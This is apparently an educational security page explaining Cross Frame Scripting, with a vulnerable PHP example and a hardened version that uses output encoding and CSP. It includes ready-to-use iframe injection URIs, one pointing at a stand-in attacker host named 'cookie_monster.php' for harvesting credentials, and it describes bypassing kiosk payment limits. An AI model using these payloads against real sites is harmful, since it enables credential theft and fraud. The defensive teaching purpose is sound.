Description
Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. Using this technique the attacker injects a frame (typically an <iframe> whose source is a server he controls) into a vulnerable page, so that content of his choosing is rendered inside a page the victim trusts. With an XFS attack he is able to inject his own content into a login form whose purpose is to authenticate the valid user to his/her bank or auction account; the user types the credentials into what looks like the genuine form, and they are delivered to the attacker instead.
Examples
The attacker has found a website that allows for variable manipulation: parameters are sent using the GET or POST method, but they are neither properly validated nor encoded before being echoed back into the page, e.g.:

cat greetz.php
<?php
print "Hello! Welcome to Hell!";
print $_GET['greetings'];
?>

If the attacker requests the following URI (the payload is shown decoded for readability; in the actual request it would be URL-encoded):

/greetz.php?greetings=<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>

then the code injection attack succeeds: the server reflects the parameter verbatim, and the victim's browser renders an attacker-controlled frame inside greetz.php.
Another example is a simple JavaScript nesting, using a javascript: URL as the frame source:

/greetz.php?greetings=<iframe src="javascript:alert('0wn3d!');"></iframe>

A javascript: frame source executes in the origin of the embedding document, i.e. the origin of greetz.php itself, so the injected script has the same access to cookies and DOM as the vulnerable site's own code.
The attacker may combine the above examples with appropriate frame attributes (width, height, frameborder, style) so that the injected frame fits the original layout of the page that is prone to Cross Frame Scripting and the victim sees nothing unusual. This attack can also be successfully used to bypass limitations of e.g. an E-kiosk that charges for Internet access or for its extra functionality/areas, by loading arbitrary content inside a frame injected into an allowed page.
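The root cause in greetz.php is that untrusted input is reflected into the HTML body without output encoding. The following is an added example, not code from the original page: the vulnerable rendering beside an output-encoded version, run from the command line against the two payloads shown above (the hostname my.evilsites.com is the page's own example host; the function names and the payload labels are assumptions made here). It requires PHP 8 for str_contains().

```php
<?php
// Added example: the vulnerable greetz.php pattern next to a hardened version.
// Run with: php xfs_demo.php

// Vulnerable: reflects the parameter verbatim into the HTML body (as greetz.php does).
function render_vulnerable(string $greeting): string
{
    return "Hello! Welcome to Hell!" . $greeting;
}

// Hardened: HTML-encode the untrusted value for the HTML body context.
// ENT_QUOTES also encodes ' and ", so the value cannot break out of an
// attribute either if it is later reused inside one.
function render_safe(string $greeting): string
{
    return "Hello! Welcome to Hell!"
        . htmlspecialchars($greeting, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Returns true if a frame tag can still start in the rendered output.
function frame_survives(string $html): bool
{
    return str_contains(strtolower($html), '<iframe');
}

// Constructed payloads: the two from the page.
$payloads = [
    'remote frame'   => '<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>',
    'javascript: src' => '<iframe src="javascript:alert(\'0wn3d!\');"></iframe>',
];

foreach ($payloads as $name => $greeting) {
    echo "== payload: $name ==\n";
    echo "vulnerable output: " . render_vulnerable($greeting) . "\n";
    echo "safe output:       " . render_safe($greeting) . "\n";
    echo "frame survives (vulnerable): " . (frame_survives(render_vulnerable($greeting)) ? 'yes' : 'no') . "\n";
    echo "frame survives (safe):       " . (frame_survives(render_safe($greeting)) ? 'yes' : 'no') . "\n\n";
}

// In the real greetz.php the body would simply be:
//   echo render_safe($_GET['greetings'] ?? '');
// As defence in depth, a Content-Security-Policy header such as
//   header("Content-Security-Policy: frame-src 'none'");
// stops the page from loading any frame at all, even if encoding is missed elsewhere.
```

For the remote-frame payload the safe output reads `&lt;iframe src=&quot;http://my.evilsites.com/cookie_monster.php&quot;&gt;&lt;/iframe&gt;`, which the browser displays as text rather than rendering as a frame; the vulnerable output contains the tag unchanged. Encoding belongs at output time in the context the value lands in (here the HTML body), not at input time, and CSP frame-src only limits what frames the page may load, it does not replace encoding.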